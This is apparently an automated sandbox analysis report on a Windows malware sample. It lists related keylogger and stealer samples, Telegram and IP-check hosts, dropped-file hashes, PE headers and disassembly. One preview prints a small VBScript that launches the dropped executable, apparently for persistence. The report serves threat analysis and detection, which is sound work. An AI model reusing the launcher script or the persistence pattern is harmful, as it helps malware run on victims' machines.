                                                                                                              6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.80.1
                                                                                                              checkip.dyndns.com7b4Iaf58Rp.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 132.226.8.169
                                                                                                              C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 132.226.247.73
                                                                                                              4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 193.122.6.168
                                                                                                              b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 132.226.8.169
                                                                                                              UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 132.226.8.169
                                                                                                              9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 132.226.247.73
                                                                                                              VQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 132.226.247.73
                                                                                                              api.telegram.orgC5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              TELEGRAMRUC5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              UTMEMUS7b4Iaf58Rp.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 132.226.8.169
                                                                                                              rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 132.226.247.73
                                                                                                              4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 132.226.8.169
                                                                                                              UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 132.226.8.169
                                                                                                              9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 132.226.247.73
                                                                                                              6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 132.226.247.73
                                                                                                              JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 132.226.8.169
                                                                                                              upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              CLOUDFLARENETUSFull-Ver_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 104.21.11.60
                                                                                                              7b4Iaf58Rp.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 104.21.80.1
                                                                                                              C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.80.1
                                                                                                              rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.96.1
                                                                                                              4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              • 104.21.112.1
                                                                                                              gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 104.21.96.1
                                                                                                              Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.112.1
                                                                                                              M7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 172.67.186.192
                                                                                                              b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.80.1
                                                                                                              UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.48.1
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              54328bd36c14bd82ddaa0c04b25ed9ad7b4Iaf58Rp.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 104.21.32.1
                                                                                                              C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.32.1
                                                                                                              rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.32.1
                                                                                                              4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              • 104.21.32.1
                                                                                                              Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.32.1
                                                                                                              b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.32.1
                                                                                                              UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.32.1
                                                                                                              9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.32.1
                                                                                                              VQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 104.21.32.1
                                                                                                              6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.32.1
                                                                                                              3b5074b1b5d032e5620f69f9f700ff0eC5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              3j7f6Bv4FT.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              3j7f6Bv4FT.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              iRmpdWgpoF.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              No context
                                                                                                              Process:C:\Users\user\Desktop\6cicUo3f8g.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):128668
                                                                                                              Entropy (8bit):7.899969736428741
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:A1aXNknskqvWcOonhfb70XNJPqYqu0zcEeYQV/Q/G:AkXmXPcOonhWNtqYqUf4/G
                                                                                                              MD5:85F79BF6C6F6C04600110CE3F25DC877
                                                                                                              SHA1:1E3257B75E6AF562DDE1AF8FE00C9127E28D2040
                                                                                                              SHA-256:36DB44B1D2612B411465ED21A00B80CA791B76BF67DD0443186227D00B01D70C
                                                                                                              SHA-512:6EB079FAA2A98C640BB5F79CC46B4B92E2696881E6D09534888FD18F190DEC83BD2C33C48FFD39AC3A5F42996A0E2EE2D4A5116D60984C9051F550D561CFAE8D
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview:EA06..0.....Zm"c4.M...W..3.T&S)...S.V..).F.E.......k4.L......g..8O.?....].[}.;.......7Y..}7.....F.+..b.j..EG.EeS...+..Vg.I...<.E..3...W..V....f....M......3.R..).\....MR.N..F.j............S..Ff..Q..BgL..Tb.Z.......X..j.......P.N..Y....T&u.......U.3......1...Qj,.z.9.u.R...v7@........R.....,....*|1Z.Zgh.I..p...X....p.M..>.u"ct.Q$...^.3..820.B..8_....2.2..T|p.p..T........S.pj.*.6..)f..Y.W]V........g{....F....1B.T(U..h..T..................9.X..(..(.....p........9..J5.....j.z..j..u..G.M.....3.H.3).'.Q.V.2......l.[..k>.M....'C.Vx...Ja{.Qi.i<.a6.W.J..S.I.t:.".|..#.....H...].g4.J,.)..kJ.h..9...P..s...L.Mf.I......o.z5j.x.K.tZu254.E's....^......W....F..8F.....a1..#6.t.e5..jv.%_.;..(6KU>I0.PcsX..].L......8..T.....6.M&.+t.?..I......t...UZ.~.z..+...v....s:eR32..e.....4..........I6^.P.Lk_*.N.r.T.....H..#P.-:S4.M......p..+R...T......:..PQ.R.d.5z.l$5*%VE........a0..sJ.o.P.N&....>..M....:.5.Y..z]..P.y&S)...{.V....r.4#....iT..&3)......4....R..f.....4.Q.p...e7....j.
                                                                                                              Process:C:\Users\user\AppData\Local\Thebesian\toggeries.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):128668
                                                                                                              Entropy (8bit):7.899969736428741
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:A1aXNknskqvWcOonhfb70XNJPqYqu0zcEeYQV/Q/G:AkXmXPcOonhWNtqYqUf4/G
                                                                                                              MD5:85F79BF6C6F6C04600110CE3F25DC877
                                                                                                              SHA1:1E3257B75E6AF562DDE1AF8FE00C9127E28D2040
                                                                                                              SHA-256:36DB44B1D2612B411465ED21A00B80CA791B76BF67DD0443186227D00B01D70C
                                                                                                              SHA-512:6EB079FAA2A98C640BB5F79CC46B4B92E2696881E6D09534888FD18F190DEC83BD2C33C48FFD39AC3A5F42996A0E2EE2D4A5116D60984C9051F550D561CFAE8D
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview:EA06..0.....Zm"c4.M...W..3.T&S)...S.V..).F.E.......k4.L......g..8O.?....].[}.;.......7Y..}7.....F.+..b.j..EG.EeS...+..Vg.I...<.E..3...W..V....f....M......3.R..).\....MR.N..F.j............S..Ff..Q..BgL..Tb.Z.......X..j.......P.N..Y....T&u.......U.3......1...Qj,.z.9.u.R...v7@........R.....,....*|1Z.Zgh.I..p...X....p.M..>.u"ct.Q$...^.3..820.B..8_....2.2..T|p.p..T........S.pj.*.6..)f..Y.W]V........g{....F....1B.T(U..h..T..................9.X..(..(.....p........9..J5.....j.z..j..u..G.M.....3.H.3).'.Q.V.2......l.[..k>.M....'C.Vx...Ja{.Qi.i<.a6.W.J..S.I.t:.".|..#.....H...].g4.J,.)..kJ.h..9...P..s...L.Mf.I......o.z5j.x.K.tZu254.E's....^......W....F..8F.....a1..#6.t.e5..jv.%_.;..(6KU>I0.PcsX..].L......8..T.....6.M&.+t.?..I......t...UZ.~.z..+...v....s:eR32..e.....4..........I6^.P.Lk_*.N.r.T.....H..#P.-:S4.M......p..+R...T......:..PQ.R.d.5z.l$5*%VE........a0..sJ.o.P.N&....>..M....:.5.Y..z]..P.y&S)...{.V....r.4#....iT..&3)......4....R..f.....4.Q.p...e7....j.
                                                                                                              Process:C:\Users\user\AppData\Local\Thebesian\toggeries.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):128668
                                                                                                              Entropy (8bit):7.899969736428741
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:A1aXNknskqvWcOonhfb70XNJPqYqu0zcEeYQV/Q/G:AkXmXPcOonhWNtqYqUf4/G
                                                                                                              MD5:85F79BF6C6F6C04600110CE3F25DC877
                                                                                                              SHA1:1E3257B75E6AF562DDE1AF8FE00C9127E28D2040
                                                                                                              SHA-256:36DB44B1D2612B411465ED21A00B80CA791B76BF67DD0443186227D00B01D70C
                                                                                                              SHA-512:6EB079FAA2A98C640BB5F79CC46B4B92E2696881E6D09534888FD18F190DEC83BD2C33C48FFD39AC3A5F42996A0E2EE2D4A5116D60984C9051F550D561CFAE8D
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview:EA06..0.....Zm"c4.M...W..3.T&S)...S.V..).F.E.......k4.L......g..8O.?....].[}.;.......7Y..}7.....F.+..b.j..EG.EeS...+..Vg.I...<.E..3...W..V....f....M......3.R..).\....MR.N..F.j............S..Ff..Q..BgL..Tb.Z.......X..j.......P.N..Y....T&u.......U.3......1...Qj,.z.9.u.R...v7@........R.....,....*|1Z.Zgh.I..p...X....p.M..>.u"ct.Q$...^.3..820.B..8_....2.2..T|p.p..T........S.pj.*.6..)f..Y.W]V........g{....F....1B.T(U..h..T..................9.X..(..(.....p........9..J5.....j.z..j..u..G.M.....3.H.3).'.Q.V.2......l.[..k>.M....'C.Vx...Ja{.Qi.i<.a6.W.J..S.I.t:.".|..#.....H...].g4.J,.)..kJ.h..9...P..s...L.Mf.I......o.z5j.x.K.tZu254.E's....^......W....F..8F.....a1..#6.t.e5..jv.%_.;..(6KU>I0.PcsX..].L......8..T.....6.M&.+t.?..I......t...UZ.~.z..+...v....s:eR32..e.....4..........I6^.P.Lk_*.N.r.T.....H..#P.-:S4.M......p..+R...T......:..PQ.R.d.5z.l$5*%VE........a0..sJ.o.P.N&....>..M....:.5.Y..z]..P.y&S)...{.V....r.4#....iT..&3)......4....R..f.....4.Q.p...e7....j.
                                                                                                              Process:C:\Users\user\Desktop\6cicUo3f8g.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):274432
                                                                                                              Entropy (8bit):6.8669926666203205
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:BIVsmbREB8KIpH91iOCLbUmGhooQVd7/ArauXoQATIrgMl0X:uVscEB8KIpH91iOCLbUmGhooQVd7/Arm
                                                                                                              MD5:DD27F42376CB50AA257B4E8884D1BC54
                                                                                                              SHA1:F245E8A786BBA274D8058B3F0AD637AB4CD9DEFE
                                                                                                              SHA-256:DBCFBCC5F610189F9A4F724DF7DC942FB6F6CE773C54C108F0AC175EC4D8D88B
                                                                                                              SHA-512:8C88D4113E92060312EBD50EA35C00D2533C9B51F053592BD40432C9790D4D297623B8FF712B3E8D5E0EDA3A4D159CEEA19C40F34174B1E9C53E2763869CEB73
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview:y..EMH1446E0..T3.P225CVS.ZUR4QPENH1406E054T3LP225CVSFZUR4QPE.H14>).>5.].m.3~.b.;/)u"F>77/%.WQX+_A.6Vl"G\.*8s...rY>4 `E<>.6E054T3..22yBUS...44QPENH14.6G1>5.3LJ625WVSFZURziTENh140vA054.3Lp225AVSBZUR4QPEJH1406E05.P3LR225CVSDZ..4Q@ENX1406U05$T3LP22%CVSFZUR4QPE..54c6E05tP3[@225CVSFZUR4QPENH140VA094T3LP225CVSFZUR4QPENH1406E054T3LP225CVSFZUR4QPENH140.E0=4T3LP225CVSNzUR|QPENH1406E0.@1K8P22a[RSFzUR4KTENJ1406E054T3LP22.CV3h(& WQPEYX140vA05&T3LL625CVSFZUR4QPE.H1t.D \ZWT3@P225#RSFXUR4.TENH1406E054T3.P2p5CVSFZUR4QPENH14..A054T3.P227CSS..WRT.QEMH14.6E6.V3.P225CVSFZUR4QPENH1406E054T3LP225CVSFZUR4QPE.5.;...YF..3LP225BTPB\]Z4QPENH14N6E0s4T3.P22.CVScZURYQPEjH14N6E0K4T3(P22GCVS'ZURsQPE!H14^6E0K4T3RR..5C\y`ZWz.QPONb.G.6E:.5T3H#.25I.QFZQ!.QPO.K144E`05>.7LP6A.CVY._UR0{.EM.'206^_.4T9LS.'3CVHl|UP.kPEDH..05.%34T(fr20.JVSBp.!)QPCf.14:BL056.9LP6.+A~.FZ_x./[ENL.4..;<54P.Lz.L8CVWmZ.L6.]ENL..N8E01.T.n.=25G}SlDW.;QPAdjO$06A.5.vM]P26.C|q8HUR0zPol6"402n0..*'LP6.5it-SZUV.Qzg0^144.E..JC3LT.2.a(KFZQy4{NG.P144.C.W4&.YPB1
                                                                                                              Process:C:\Users\user\Desktop\6cicUo3f8g.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1033728
                                                                                                              Entropy (8bit):7.023800861027484
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:Ou6J33O0c+JY5UZ+XC0kGso6Fa4rtKwUtjWWY:Au0c++OCvkGs9Fa4rInTY
                                                                                                              MD5:D721EAB396039744DF30C1C4AC89386E
                                                                                                              SHA1:DB06BCB42971088989F20C795E484611B37B35B0
                                                                                                              SHA-256:F800B332A02989CB73F92D0B58F9658F7F5389BE1A966670C507CCBD32C31CE7
                                                                                                              SHA-512:AAB9F2EA6979D26DF263378E629FF9058652C3622BDA8C913968DD45C461D546CF1CBC337387EE344109F0273248476C44640B0E9F14DEBA944C92FAC1F8E226
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 83%
                                                                                                              Reputation:low
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...]'Vg.........."..................}............@..........................0............@...@.......@.....................L...|....p...<.......................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....<...p...>..................@..@.reloc...q.......r...T..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\AppData\Local\Thebesian\toggeries.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):284
                                                                                                              Entropy (8bit):3.3748911086851305
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:DMM8lfm3OOQdUfclzXUEZ+lX105WlMTY8km6nriIM8lfQVn:DsO+vNlDQ105WM4mA2n
                                                                                                              MD5:F6035D95C478EF360E3340AEC2308803
                                                                                                              SHA1:C34588B378C7CFC98E5258752CF2F2E2621B46D5
                                                                                                              SHA-256:C5F5A4B3F5609462321499211E5073BE19157D15E797564761E2557B2F9BF1F5
                                                                                                              SHA-512:81A4E93429A6CBD8A0DD739FD1E0CA6C22F60EF3C44ED8DAF1BA63CE2B266D6008378AF8AC33FB6DA40D0C3902BDE6D40E375A9FF4F73210F694E3F486E88AB4
                                                                                                              Malicious:true
                                                                                                              Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.h.e.b.e.s.i.a.n.\.t.o.g.g.e.r.i.e.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):7.023800861027484
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:6cicUo3f8g.exe
                                                                                                              File size:1'033'728 bytes
                                                                                                              MD5:d721eab396039744df30c1c4ac89386e
                                                                                                              SHA1:db06bcb42971088989f20c795e484611b37b35b0
                                                                                                              SHA256:f800b332a02989cb73f92d0b58f9658f7f5389be1a966670c507ccbd32c31ce7
                                                                                                              SHA512:aab9f2ea6979d26df263378e629ff9058652c3622bda8c913968dd45c461d546cf1cbc337387ee344109f0273248476c44640b0e9f14deba944c92fac1f8e226
                                                                                                              SSDEEP:24576:Ou6J33O0c+JY5UZ+XC0kGso6Fa4rtKwUtjWWY:Au0c++OCvkGs9Fa4rInTY
                                                                                                              TLSH:8D25BE22B3DDC361CB669173BF6973016EBF7C650630B85B2F880D79A950171262DBA3
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                                                              Icon Hash:6b69616563c36a25
                                                                                                              Entrypoint:0x427dcd
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x6756275D [Sun Dec 8 23:10:21 2024 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:5
                                                                                                              OS Version Minor:1
                                                                                                              File Version Major:5
                                                                                                              File Version Minor:1
                                                                                                              Subsystem Version Major:5
                                                                                                              Subsystem Version Minor:1
                                                                                                              Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                                                              Instruction
                                                                                                              call 00007F02AC975E7Ah
                                                                                                              jmp 00007F02AC968C44h
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              push edi
                                                                                                              push esi
                                                                                                              mov esi, dword ptr [esp+10h]
                                                                                                              mov ecx, dword ptr [esp+14h]
                                                                                                              mov edi, dword ptr [esp+0Ch]
                                                                                                              mov eax, ecx
                                                                                                              mov edx, ecx
                                                                                                              add eax, esi
                                                                                                              cmp edi, esi
                                                                                                              jbe 00007F02AC968DCAh
                                                                                                              cmp edi, eax
                                                                                                              jc 00007F02AC96912Eh
                                                                                                              bt dword ptr [004C31FCh], 01h
                                                                                                              jnc 00007F02AC968DC9h
                                                                                                              rep movsb
                                                                                                              jmp 00007F02AC9690DCh
                                                                                                              cmp ecx, 00000080h
                                                                                                              jc 00007F02AC968F94h
                                                                                                              mov eax, edi
                                                                                                              xor eax, esi
                                                                                                              test eax, 0000000Fh
                                                                                                              jne 00007F02AC968DD0h
                                                                                                              bt dword ptr [004BE324h], 01h
                                                                                                              jc 00007F02AC9692A0h
                                                                                                              bt dword ptr [004C31FCh], 00000000h
                                                                                                              jnc 00007F02AC968F6Dh
                                                                                                              test edi, 00000003h
                                                                                                              jne 00007F02AC968F7Eh
                                                                                                              test esi, 00000003h
                                                                                                              jne 00007F02AC968F5Dh
                                                                                                              bt edi, 02h
                                                                                                              jnc 00007F02AC968DCFh
                                                                                                              mov eax, dword ptr [esi]
                                                                                                              sub ecx, 04h
                                                                                                              lea esi, dword ptr [esi+04h]
                                                                                                              mov dword ptr [edi], eax
                                                                                                              lea edi, dword ptr [edi+04h]
                                                                                                              bt edi, 03h
                                                                                                              jnc 00007F02AC968DD3h
                                                                                                              movq xmm1, qword ptr [esi]
                                                                                                              sub ecx, 08h
                                                                                                              lea esi, dword ptr [esi+08h]
                                                                                                              movq qword ptr [edi], xmm1
                                                                                                              lea edi, dword ptr [edi+08h]
                                                                                                              test esi, 00000007h
                                                                                                              je 00007F02AC968E25h
                                                                                                              bt esi, 03h
                                                                                                              jnc 00007F02AC968E78h
                                                                                                              Programming Language:
                                                                                                              • [ASM] VS2013 build 21005
                                                                                                              • [ C ] VS2013 build 21005
                                                                                                              • [C++] VS2013 build 21005
                                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                                              • [IMP] VS2008 SP1 build 30729
                                                                                                              • [ASM] VS2013 UPD4 build 31101
                                                                                                              • [RES] VS2013 build 21005
                                                                                                              • [LNK] VS2013 UPD4 build 31101
                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x33c88.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xfb0000x711c.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .rsrc0xc70000x33c880x33e0008ffdb15cff6468fd529917e14706f53False0.957285391566265data7.930748096602802IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0xfb0000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_ICON0xc74580x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
